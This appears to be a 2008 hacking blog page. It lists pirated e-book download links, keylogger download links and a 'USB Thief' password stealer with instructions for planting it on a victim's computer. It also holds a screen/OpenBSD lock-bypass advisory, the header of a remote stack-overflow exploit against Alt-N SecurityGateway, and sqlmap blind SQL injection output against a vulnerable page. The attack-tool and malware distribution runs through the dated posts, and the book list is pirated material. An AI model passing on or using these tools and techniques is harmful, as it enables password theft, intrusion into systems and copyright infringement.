BLUETOOTH
Bluetooth Security | http://rapidshare.com/files/80571135/Bluetooth_Security.pdf
CRACKING
CRYPTOGRAPHY
An Introduction to Cryptography | http://rapidshare.com/files/80521228/An_Introduction_to_Cryptography.pdf
Cryptography's Role in Securing The Information Society | http://rapidshare.com/files/80521293/Cryptography_s_Role_n_Securing_The_Information_Society.pdf
HACKING
Defeating Encryption | http://rapidshare.com/files/80521187/Defeating_Encryption.pdf
How To Make Keygens | http://rapidshare.com/files/80521297/E-Book_-_How_To_Make_Keygens.pdf
Hacker's book Common Ways to Attack | http://rapidshare.com/files/80521308/www-hackersbook-com_chapter_common-ways-to-attack.pdf
Hacking For Dummies 1 | http://rapidshare.com/files/80521937/Hacking_For_Dummies_1.pdf
Hacking For Dummies 2 | http://rapidshare.com/files/80521984/Hacking_For_Dummies_2.pdf
Hacking into computer systems - a beginners guide | http://rapidshare.com/files/80522046/Hacking_into_computer_systems_-_a_beginners_guide.pdf
Hacking Windows XP | http://rapidshare.com/files/80522644/John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf
The Art Of Exploitation | http://rapidshare.com/files/80522872/No.Starch.Press.Hacking.The.Art.Of.Exploitation.eBook-LiB.chm
Syngress Buffer Overflow Attacks | http://rapidshare.com/files/80523456/Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
Wiley Reversing Secrets of Reverse Engineering | http://rapidshare.com/files/80523920/Wiley.Reversing.Secrets.of.Reverse.Engineering.Apr.2005.eBook-DDU.pdf
Hack - Discovery Nmap | http://rapidshare.com/files/80525146/Ebook_-_Hack_-_Discovery_Nmap.pdf
Pocket Hack Master Users Guide | http://rapidshare.com/files/80529070/Pocket_Hack_Master_Users_Guide.pdf
Learn to hack in easy steps | http://rapidshare.com/files/80537215/_ebook_computing__Learn_to_hack_in_easy_steps.pdf
Hacking - Firewalls And Networks How To Hack Into a Remote Computers | http://rapidshare.com/files/80574003/Hacking_-_Firewalls_And_Networks_How_To_Hack_Into_a_Remote_Computers.pdf
HARDWARE
Cable Modem Hack walk through | http://rapidshare.com/files/80525141/cable_modem_hack_walkthrough.pdf
NETWORKING
Cisco TCP-IP Routing Professional Reference | http://rapidshare.com/files/80527872/McGraw-Hill_Cisco_TCP-IP_Routing_Professional_Reference.pdf
Network Concepts | http://rapidshare.com/files/80527897/networkconcepts.pdf
Networking 4 | http://rapidshare.com/files/80527904/Networking4.pdf
Networking Protocol Suites | http://rapidshare.com/files/80528530/Networking_Protocol_Suites.pdf
Networking Bible | http://rapidshare.com/files/80528882/Networking.Bible.pdf
OReilly - Virtual Private Networks, Second Edition | http://rapidshare.com/files/80528971/OReilly_-_Virtual_Private_Networks__Second_Edition.pdf
Sybex, Network+ Study Guide | http://rapidshare.com/files/80529700/Sybex__Network__Study_Guide__2005___4Ed_DDU_LotB.pdf
The Encyclopedia of Networking 2 Edition | http://rapidshare.com/files/80530506/The_Encyclopedia_of_Networking_2._Edition.pdf
TS--Disable.Internet | http://rapidshare.com/files/80530511/TS--Disable.Internet.pdf
Network Security A Beginners Guide | http://rapidshare.com/files/80558286/Network.Security.A_Beginners.Guide.rar
Data Servers, Networking, and Security | http://rapidshare.com/files/80563702/C_R_S_N.pdf
Data Networks | http://rapidshare.com/files/80566896/D_N_I_P.pdf
Wireless Communications and Networking | http://rapidshare.com/files/80567752/W_C_N.pdf
Network Programming for Microsoft Windows - Second Edition | http://rapidshare.com/files/80570918/Mcft-_Second_Edition_-_Caudex.chm
SECURITY
Hacker's book Identifying Attackers | http://rapidshare.com/files/80521327/www-hackersbook-com_chapter_identifying-attackers.pdf
Hack Attacks Revealed | http://rapidshare.com/files/80521836/Hack_Attacks_Revealed.pdf
Hackers Secrets | http://rapidshare.com/files/80521881/Hackers_Secrets.pdf
Maximum Security - A Hacker's Guide to Protecting Your Inter | http://rapidshare.com/files/80522774/Maximum_Security_-_A_Hacker_s_Guide_to_Protecting_Your_Inter.pdf
Hack Proofing - Your Network - Internet Tradecraft | http://rapidshare.com/files/80525311/Hack_Proofing_-_Your_Network_-_Internet_Tradecraft.pdf
Hack Proofing Your Wireless Network | http://rapidshare.com/files/80525674/Hack_Proofing_Your_Wireless_Network.pdf
Hacking Exposed Network Security Secrets & Solutions, Third | http://rapidshare.com/files/80525820/Hacking_Exposed_Network_Security_Secrets___Solutions__Third_.pdf
Hacking Exposed- Web Applications | http://rapidshare.com/files/80530894/Hacking_Exposed-_Web_Applications__MCGraw-Hill-2002_.pdf
Cross Site Scripting Detection and Prevention | http://rapidshare.com/files/80534573/Cross_site_scripting_detection_and_prevention.pdf
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80535490/Hack_IT_Security_Through_Penetration_Testing.pdf
Hacker Secret Book | http://rapidshare.com/files/80535523/Hacker_Secret_Book.pdf
Hackerland | http://rapidshare.com/files/80535553/Hackerland.pdf
Hacker's Encyclopedia | http://rapidshare.com/files/80535564/Hacker_s_Encyclopedia.txt
Hacking Exposed | http://rapidshare.com/files/80536064/Hacking_Exposed.pdf
HACKKIT | http://rapidshare.com/files/80536092/HACKKIT.TXT
Hugo Cornwall - The Hacker's Handbook | http://rapidshare.com/files/80536117/Hugo_Cornwall_-_The_Hacker_s_Handbook_.pdf
ICMP Scanning v2.0 | http://rapidshare.com/files/80536148/ICMP_Scanning_v2.0.pdf
IIS_Security_and_Programming_Countermeasures | http://rapidshare.com/files/80536371/IIS_Security_and_Programming_Countermeasures.pdf
Improve by Breaking | http://rapidshare.com/files/80536377/improve_by_breakin.txt
Maximum Security | http://rapidshare.com/files/80536559/Maximum_Security.pdf
Network - The Hacker Crackdown | http://rapidshare.com/files/80536598/Network_-_The_Hacker_Crackdown.pdf
PC TIPS & TRICKS - Hacker Bible | http://rapidshare.com/files/80536612/PC_TIPS___TRICKS_-_Hacker_Bibel_2000_.pdf
Practical Stealth Portscan Discovery | http://rapidshare.com/files/80536625/Practical_Stealth_Portscan_Discovery_-_spice-ccs2000.pdf
Practical-SEH-exploitation | http://rapidshare.com/files/80536685/Practical-SEH-exploitation.pdf
Hall PTR Internet Denial of Service Attack and Defense Mechanisms | http://rapidshare.com/files/80536799/Prentice_1_.Hall.PTR.Internet.Denial.of.Service.Attack.and.Defense.Mechanisms.eBook-DDU.zip
Router Security Guidance Activity | http://rapidshare.com/files/80536939/Router_Security_Guidance_Activity.pdf
XML Security | http://rapidshare.com/files/80537208/XML_Secuirty.pdf
100 Ways To Disappear | http://rapidshare.com/files/80537236/100_Ways_To_Disappear.doc
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80537514/Addison.Wesley-Hack.I.T.Security.Through.Penetration.Testing-2002.chm
Computer Vulnerabilities | http://rapidshare.com/files/80537550/Computer_Vulnerabilities.pdf
Configuring Windows 2000 Server Security | http://rapidshare.com/files/80537787/Configuring_Windows_2000_Server_Security.pdf
Hacker Web Exploitation Uncovered | http://rapidshare.com/files/80552331/Hacker.Web.Exploitation.Uncovered-fusion89_waushare.rar
A Plus Network Plus Security Plus Exams in A Nutshell | http://rapidshare.com/files/80557304/A_Plus_Network_Plus_Security_Plus_Exams_in_A_Nutshell.pdf
Handbook of Database Security | http://rapidshare.com/files/80561473/Handbook.of.Database.Security.0387485325.rar
The International Handbook of Computer Security | http://rapidshare.com/files/80562155/The.International.Handbook.of.Computer.Security.eBook-EEn.pdf
Auerbach Information Security Management Handbook 6th Edition | http://rapidshare.com/files/80566300/Auerbach.Information.Security.Management.Handbook.6th.Edition-BBL.rar
Router Security | http://rapidshare.com/files/80571279/Router_Security_Guidance_Activity.pdf
Firewall Book | http://rapidshare.com/files/80572125/Juniper_Firewall_Book.pdf
Building Internet Firewalls | http://rapidshare.com/files/80572698/Building_Internet_Firewalls_2nd_Edition_eBooK.pdf
LINUX
Understanding the LINUX Kernel | http://rapidshare.com/files/80520345/O_Reilly_-_Understanding_The_Linux_Kernel.pdf
O'Reilly Linux In A Nutshell, 4th Edition | http://rapidshare.com/files/80524025/O_Reilly_--_Linux_In_A_Nutshell__4th_Edition.chm
Sams Linux Shell Scripting with Bash | http://rapidshare.com/files/80524406/Sams.Linux.Shell.Scripting.with.Bash.eBook-LinG.pdf
Hacking Red Hat Kickstart | http://rapidshare.com/files/80524412/Hacking_Red_Hat_Kickstart.pdf
Linux From Scratch | http://rapidshare.com/files/80524467/Linux_From_Scratch.pdf
How Linux Works What Every Super User Should Know | http://rapidshare.com/files/80525139/No.Starch.Press.How.Linux.Works.What.Every.Super.User.Should.Know.eBook-LiB.chm
Linux Networking Bible | http://rapidshare.com/files/80526912/Linux_Networking_Bible.pdf
Red Hat Linux | http://rapidshare.com/files/80531297/R_H_L.pdf
Linux Complete Command Reference | http://rapidshare.com/files/80531851/Linux_Complete_Command_Reference-0672311046.pdf
Linux Network Servers | http://rapidshare.com/files/80532189/Linux.Network.Servers.pdf
Hardening Linux | http://rapidshare.com/files/80532688/Hardening_Linux.chm
The Linux Networking Architecture Design and Implementation of Network
Linux Shell Scripting Tutorial | http://rapidshare.com/files/80549460/Linux_Shell_Scripting_Tutorial.posted_at_eselfilme.de.pdf
Fedora Linux | http://rapidshare.com/files/80553910/Fedora.Linux.Oct.2006.rar
Linux For Dummies 7th Edition | http://rapidshare.com/files/80563973/Linux.For.Dummies.7th.Edition.May.2006.rar
UNIX
UNIX Hints & Hacks | http://rapidshare.com/files/80550133/UNIX_Hints___Hacks.pdf
Unix Commands | http://rapidshare.com/files/80550137/Unix_Commands.pdf
Unixguide | http://rapidshare.com/files/80550141/unixguide.pdf
Unix-power-tools | http://rapidshare.com/files/80550891/unix-power-tools.pdf
PROGRAMMING
GENERAL
Writing security tools and exploits | http://rapidshare.com/files/80562045/writing-security-tools-and-exploits.9781597499972.23482.pdf
Coding Secure Code | http://rapidshare.com/files/80562700/Code_Sec.pdf
ASM
Assembler Intel Code Table | http://rapidshare.com/files/80541077/Assembler_Intel_Code_Table.pdf
ASP
C/C++
ANSI-ISO C++ Professional Programmer's Handbook | http://rapidshare.com/files/80541154/ANSI-ISO_C___Professional_Programmer_s_Handbook.pdf
C in 21 Days | http://rapidshare.com/files/80541336/C_in_21_Days.pdf
C Programming | http://rapidshare.com/files/80541454/C_Programming.PDF
C++ Programming HOW-TO v40 | http://rapidshare.com/files/80541477/C___Programming_HOW-TO_v40.3.pdf
C++ | http://rapidshare.com/files/80541709/C__.pdf
CPP | http://rapidshare.com/files/80541753/cpp_einfuehrung.pdf
Object-Oriented System Development | http://rapidshare.com/files/80541952/Object-Oriented_System_Development.pdf
Thinking in C++ Volume1 | http://rapidshare.com/files/80542096/Thinking_in_C___Volume1.pdf
Visual C++ for Dummies Quick Reference | http://rapidshare.com/files/80542657/Visual_C___for_Dummies_Quick_Reference.pdf
C++ Standard Library | http://rapidshare.com/files/80564172/tc__sl.rar
C#
Pro C# 2008 and the NET 3.5 Platform Fourth Edition | http://rapidshare.com/files/80573838/Pro_C__2008_and_the_NET_3.5_Platform_Fourth_Edition.pdf
CORBA
CORBA Firewall Security | http://rapidshare.com/files/80542859/CORBA_Firewall_Security.pdf
CORBA on the Internet | http://rapidshare.com/files/80542962/CORBA_on_the_Internet_-_0iona.pdf
CORBA Proxy | http://rapidshare.com/files/80542980/CORBA_Proxy.pdf
DOCsec3 | http://rapidshare.com/files/80542987/DOCsec3.ppt
Domain Boundary Controller | http://rapidshare.com/files/80543001/Domain_Boundary_Controller_-_Xtradyne.pdf
Firewalls - OSE Remote | http://rapidshare.com/files/80543043/Firewalls_-_OSE_Remote.pdf
Java RMI, CORBA und Firewalls | http://rapidshare.com/files/80543047/Java_RMI__CORBA_und_Firewalls.pdf
NAI-Labs-Intrusion Tolerant CORBA | http://rapidshare.com/files/80543056/NAI-Labs-Intrusion_Tolerant_CORBA.pdf
OrbixWeb | http://rapidshare.com/files/80543082/OrbixWeb1.ppt
RMI CORBA und Firewalls | http://rapidshare.com/files/80543092/RMI_CORBA_und_Firewalls.pdf
Seitz - Generic Proxy Platform for CORBA Applications | http://rapidshare.com/files/80543097/Seitz_-_Generic_Proxy_Platform_for_CORBA_Applications.pdf
Status of the CORBA Firewall | http://rapidshare.com/files/80543105/Status_of_the_CORBA_Firewall.pdf
Teach Yourself CORBA In 14 Days | http://rapidshare.com/files/80543199/Teach_Yourself_CORBA_In_14_Days.pdf
CGI
CGI Developer's Guide | http://rapidshare.com/files/80545793/CGI_Developer_s_Guide.pdf
CGI for Commerce | http://rapidshare.com/files/80545890/CGI_for_Commerce.pdf
Java
Creating Web Applets with Java | http://rapidshare.com/files/80543256/Creating_Web_Applets_with_Java.pdf
Java CGI How To | http://rapidshare.com/files/80543266/Java_CGI_How_To.pdf
Javadoc | http://rapidshare.com/files/80543288/javadoc.pdf
Learning Java with JBuilder | http://rapidshare.com/files/80543535/Learning_Java_with_JBuilder.pdf
Teach Yourself Java In 21 Days | http://rapidshare.com/files/80543868/Teach_Yourself_Java_In_21_Days.pdf
Thinking in Java | http://rapidshare.com/files/80544055/Thinking_in_Java.pdf
Data Structures | http://rapidshare.com/files/80571064/Dat_Struc.pdf
Javascript
Perl
Advanced Perl Programming | http://rapidshare.com/files/80545690/Advanced_Perl_Programming.pdf
Learning Perl on Win32 Systems | http://rapidshare.com/files/80546153/Learning_Perl_on_Win32_Systems.pdf
Learning Perl | http://rapidshare.com/files/80546405/Learning_Perl.pdf
network-programming-with-perl-(slides) | http://rapidshare.com/files/80546447/network-programming-with-perl-_slides__.pdf
Perl 5 by Example | http://rapidshare.com/files/80546631/Perl_5_by_exemple_-_ebook.pdf
Perl Cookbook | http://rapidshare.com/files/80547165/Perl_Cookbook.pdf
Perl in a nutshell | http://rapidshare.com/files/80548599/perl_in_a_nutshell.pdf
Programming Perl | http://rapidshare.com/files/80549230/Programming_Perl.pdf
Teach Yourself Perl in 21 Days | http://rapidshare.com/files/80549451/Teach_Yourself_Perl_in_21_Days.pdf
Delphi
Shell
Shell Programming in 24 hours | http://rapidshare.com/files/80549646/shell_programming_in_24_hours.pdf
Windows Shell Script Programming For The Absolute Beginner | http://rapidshare.com/files/80562384/Windows_Shell_Script_Programming_For_The_Absolute_Beginner_-_Premier_Press.chm
PHP
Learn PHP in 24 Hours | http://rapidshare.com/files/80520584/SAMS_Teach_Yourself_PHP4_in_24_Hours.pdf
Premier Press - PHP.MySQL Programming for the Absolute Beginner | http://rapidshare.com/files/80533486/Premier_Press_-_PHP.MySQL_Programming_for_the_Absolute_Beginner.chm
SQL/MySQL
New Riders - MySQL and Perl for the Web | http://rapidshare.com/files/80549713/New_Riders_-_MySQL_and_Perl_for_the_Web.chm
McGraw Hill Microsoft SQL Server 2005 The Complete Reference | http://rapidshare.com/files/80553526/McGraw.Hill.Mcft.SQL.Server.2005.The.Complete.Reference.rar
Oracle
Oracle 9i - Application Developer's Guide - Fundamentals | http://rapidshare.com/files/80544288/Oracle_9i_-_Application_Developer_s_Guide_-_Fundamentals.pdf
Oracle 9i - Application Developer's Guide - Object Relational Features | http://rapidshare.com/files/80544388/Oracle_9i_-_Application_Developer_s_Guide_-_Object_Relational_Features.pdf
Oracle 9i - designer overview | http://rapidshare.com/files/80544430/Oracle_9i_-_designer_overview.pdf
Oracle 9i - form server best practices | http://rapidshare.com/files/80544445/Oracle_9i_-_form_server_best_practices_.pdf
Oracle 9i - Forms technical overview | http://rapidshare.com/files/80545024/Oracle_9i_-_Forms_technical_overview.pdf
Teach Yourself Oracle 8 In 21 Days | http://rapidshare.com/files/80545132/Teach_Yourself_Oracle_8_In_21_Days.pdf
Using Oracle8 | http://rapidshare.com/files/80545343/Using_Oracle8.pdf
Pascal
Pascal Programming | http://rapidshare.com/files/80545419/Pascal_Programming.pdf
==============================================================================================================
Download the following 15 Books in this post: (92.5 MB)
http://rapidshare.com/files/78417045/Javascript_AJAX_1.rar
[Apress] Beginning JavaScript with DOM Scripting and Ajax From Novice to Professional (2006).pdf
[Apress] Pro JavaScript Techniques (2006).pdf
[Manning] Ajax in Action (2005).pdf
[No Starch] The Book of JavaScript (2006).pdf
[O'Reilly] Head Rush Ajax (2006).chm
[O'Reilly] JavaScript, The Definitive Guide (2006).chm
[O'Reilly] Learning JavaScript (2006).chm
[Peachpit] JavaScript and Ajax for the Web (2006).chm
[Prentice Hall] PTR Understanding AJAX Using JavaScript to Create Rich Internet Applications (2006).chm
[SitePoint] Modern Web Design Using JavaScript and DOM (2005).pdf
[SitePoint] Simply JavaScript (2007).pdf
[SitePoint] The JavaScript Anthology, 101 Essential Tips, Tricks & Hacks (2006).pdf
[Wiley & Sons] Ajax Bible (2007).chm
[Wrox] Beginning JavaScript (2007).pdf
[Wrox] Professional JavaScript For Web Developers (2005).pdf
[SitePoint] Simply JavaScript (2007)
11.3 MB
Book Description
Everything you need to learn JavaScript from Scratch!
Packed with full-color examples, Simply JavaScript is a step-by-step introduction to programming in JavaScript the right way. Learn how easy it is to use JavaScript to solve real-world problems, build smarter forms, track user events (such as mouse clicks and key strokes), and design eye-catching animations. Then move into more powerful techniques using the DOM and Ajax.
* Learn JavaScript's built-in functions, methods, and properties.
* Easily integrate JavaScript in your web site.
* Use JavaScript to validate form entries and interact with your users.
* Understand how to respond to user events.
* Create animations that bring your web site to life.
* Start programming using the DOM and Ajax.
Unlike other JavaScript books, modern best practices such as progressive enhancement, accessibility and unobtrusive scripting are used from the very beginning. All the code in the book is also cross-browser compatible and downloadable for free, so you can get started instantly!
Download:
http://mihd.net/hjy2u9
[Wrox] Beginning JavaScript (2007)
12.7 MB
Book Description
Suitable for learning basic programming for Web browsers, Beginning JavaScript is a patient, introductory tutorial on writing scripts successfully. It teaches you how to create client-side scripts (including full coverage of fundamentals like variables and flow control, plus plenty of screen shots.)
JavaScript is a good way to learn programming. It's powerful, of course, but the book takes small steps, using scripts that work with string and time data first, and then moving to manipulating browser objects like forms and windows. A running case study for a trivia game helps anchor the steps with a practical (and fun) example. There are plenty of tips on debugging your scripts (including how to use the Microsoft Script Debugger tool), and each section includes sample questions. (The book also offers extensive answers in over 80 pages at the end of the book.)
There's plenty of material on the differences between Internet Explorer and Netscape, especially when it comes to Dynamic HTML (DHTML). Coverage of the Document Object Model (DOM) for browsers helps bring the text up to date on some of the latest standards in Web browsers (including the new Netscape 6).
While the focus of Beginning JavaScript clearly is on the client, later sections turn to server-side ASP development (in which the sample trivia game is enhanced with ASPs written in JavaScript using ADO and Microsoft Access.) Reference sections on JavaScript and the browser object model for Internet Explorer and Netscape (through version 4.x) round out the material.
In all, with its approachable style and clearly rendered code examples, Beginning JavaScript makes for a worthwhile first book of programming for today's browsers. Even if you haven't programmed before, this text can give you the tools you need to bring your static Web pages to life.
Download:
http://mihd.net/wbf7ks
[O'Reilly] Learning JavaScript (2006)
1.57 MB
Book Description
As web browsers have become more capable and standards compliant, JavaScript has grown in prominence. JavaScript lets designers add sparkle and life to web pages, while more complex JavaScript has led to the rise of Ajax -- the latest rage in web development that allows developers to create powerful and more responsive applications in the browser window.
Learning JavaScript introduces this powerful scripting language to web designers and developers in easy-to-understand terms. Using the latest examples from modern browser development practices, this book teaches you how to integrate the language with the browser environment, and how to practice proper coding techniques for standards-compliant web sites. By the end of the book, you'll be able to use all of the JavaScript language and many of the object models provided by web browsers, and you'll even be able to create a basic Ajax application.
Download:
http://mihd.net/39zlgn
[O'Reilly] JavaScript, The Definitive Guide (2006)
2.22 MB
Book Description
This Fifth Edition is completely revised and expanded to cover JavaScript as it is used in today's Web 2.0 applications. This book is both an example-driven programmer's guide and a keep-on-your-desk reference, with new chapters that explain everything you need to know to get the most out of JavaScript, including:
* Scripted HTTP and Ajax
* XML processing
* Client-side graphics using the
Monday, June 30, 2008
Sunday, June 29, 2008
Keyloggers
-+- Dkey 2006 KEYLOGER - http://h4ck-y0u.org/viewtopic.php?t=11575
-+- Advanced Invisible Keyloger 1.5 - http://h4ck-y0u.org/viewtopic.php?t=26247
-+- Ardamax Keylogger - http://h4ck-y0u.org/viewtopic.php?t=32529
-+- Digital Keylogger Pro by Nytro - http://h4ck-y0u.org/viewtopic.php?t=35621
-+- Perfect keylogger - http://h4ck-y0u.org/viewtopic.php?t=31377
-+- Spytecor Keylogger 1.3.5 - http://h4ck-y0u.org/viewtopic.php?t=32637
-+- Spytech - Keystroke Spy v1.10 - http://h4ck-y0u.org/viewtopic.php?t=35589
-+- Ghost Keylogger 3.80 - http://h4ck-y0u.org/viewtopic.php?t=30091
-+- EliteLog 1.9 - http://h4ck-y0u.org/viewtopic.php?t=29674
-+- Golden Keylogger 1.32 - http://h4ck-y0u.org/viewtopic.php?t=4623
Saturday, June 21, 2008
screen 4.0.3 local Authentication Bypass
Author: Rembrandt
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass
screen is vulnerable to an authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.
It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But due to the nature of the behavior of screen and OpenBSD it should be
architecture/version independent for now.
How to check this?
Lock screen using ctrl+x
Choose a Password
Confirm the Password
Screen asks for a Password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen-session.
Example:
$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt.
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$
Because of the nature of a locked screen you won't be able to lock your shell.
screen will never ask you for a password.
Of course this also works if you get access to an SSH which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Important for you should be the combination of
screen and OpenBSD.
Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.
It is known to work and I mentioned the OS.
Still it is known that it worked against some scary Linux distributions
which are not really common.
All security websites which do report this is a fake may consider to update their
reports instead of simply claiming wrong things.
Alt-N SecurityGateway v1.00-1.01
/*
* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtaining the overflow and crashing the application is a piece-of-cake job.
* To make working code execution here is hell. First we can see that
* the username, before overflowing the buffer, passes through some functions
* that change and restrict some useful chars. Firstly the buffer gets
* lowered so the overflow should not contain upper chars :( . So I decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper uses the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body always contained
* the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, maybe this char translation was due to my Russian locale.
* After a few days of work I have come up with the required bindshell which bypasses
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purposes only. Use it at your own risk. Author will not be
* responsible for any damage caused by that code.
*/
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);
void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);
struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
Friday, June 20, 2008
USB Steals Pc Passwords
Tweaked USB that steals every password, including licences.
Decompress the archive and put all the files located in the folder "USBThief" into a USB.
(You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply c/p ...)
Insert the USB in your victim's computer
View folder "dump" to see all passwords
Requirements:
No special!
Size:
1935 KB
Download:
Code:
http://rapidshare.com/files/99418536/USBThief.rar
Pass:
Code:
www.ultimate-caffe.org
Exploiting Software Vulnerabilities - A case study
This movie demonstrates how software vulnerabilities are exploited. It might also help penetration testers / ethical hackers to understand what is needed to write reliable exploits.
http://www.youtube.com/watch?v=jAX504trWZU&feature=related
Optimized Blind SQL Injection
Blind SQL injection is a technique that lets an attacker retrieve database data through a SQL injection even when the web application gives out no useful information in its error messages.
Security by obscurity is not security though. Sqlmap and Absinthe demonstrate this clearly. They are capable of getting you the whole database even if no error is shown when the user inputs characters meant to trigger an SQL error.
So how is it possible to still get database data without triggering web application errors?
These tools basically work on a true/false basis. They provide the web app with input known to be faulty, to trigger a FALSE case, and input known to be working, to trigger a TRUE case.
Using the TRUE/FALSE condition, a loop through the charset is undertaken to recover a string in the database one character at a time. Usually the SUBSTRING/CONCAT SQL functions are used to match a correct guess with the TRUE case.
The problem with this approach is the time it takes to retrieve data from the database.
Most of the tools for blind SQL injection are not optimized.
Recently I came across some nice research from Secforce.
They have written a quick tool to optimize the task of dumping a database through a blind SQL injection.
The tool, written in Python, is basically a shell.
You provide parameters such as the vulnerable web page and it then retrieves the desired portion of the database (table names, column names or full data), no different from all the other SQL injection tools.
What makes this tool better than the others (for blind SQLi) is its speed, thanks to the optimizations used to find characters.
You can read more about the implemented optimizations here.
From a test I personally undertook, I noticed that sqlmap is the tool that is best (together with the Secforce blind SQL injection tool) at dumping data through blind SQL injection.
Here's the dump from the console of an injection process using sqlmap:
C:\hack\SQL\sqlmap>sqlmap.py --url="http://localhost/vuln.asp?i=6" -p i -v 3 -b --string="Ciao"
sqlmap/0.6-rc5 coded by inquis and belch
[14:33:38] [DEBUG] request:http://localhost/vuln.asp?i=6
[14:33:43] [INFO] testing if GET parameter 'i' is dynamic
[14:33:43] [DEBUG] request:http://localhost/vuln.asp?i=47
[14:33:46] [INFO] confirming that GET parameter 'i' is dynamic
[14:33:46] [DEBUG] request:http://localhost/vuln.asp?i='NoValue
[14:33:48] [DEBUG] request:http://localhost/vuln.asp?i="NoValue
[14:33:50] [INFO] GET parameter 'i' is dynamic
[14:33:50] [INFO] testing sql injection on GET parameter 'i'
[14:33:50] [INFO] testing numeric/unescaped injection on GET parameter 'i'
[14:33:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=3
[14:33:52] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=4
[14:33:55] [INFO] confirming numeric/unescaped injection on GET parameter 'brandid'
[14:33:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND NoValue
[14:33:57] [INFO] GET parameter 'i' is numeric/unescaped injectable
[14:33:57] [INFO] testing MySQL
[14:33:57] [INFO] query: CONCAT('6', '6')
[14:33:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 63
[14:33:58] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 31
[14:34:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 15
[14:34:03] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 7
[14:34:05] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 3
[14:34:07] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ORD(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 1
[14:34:09] [INFO] retrieved:
[14:34:09] [INFO] performed 6 queries in 12 seconds
[14:34:09] [WARNING] the remote DMBS is not MySQL
As you can see from the above, sqlmap starts by testing whether the first character of our banner has an ASCII value greater than 63 (that is, 127/2). Not in our case.
[14:34:09] [INFO] testing Oracle
[14:34:09] [INFO] query: LENGTH(SYSDATE)
[14:34:09] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 63
[14:34:11] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 31
[14:34:13] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 15
[14:34:15] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 7
[14:34:17] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 3
[14:34:19] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 1
[14:34:21] [INFO] retrieved:
[14:34:21] [INFO] performed 6 queries in 12 seconds
[14:34:21] [WARNING] the remote DMBS is not Oracle
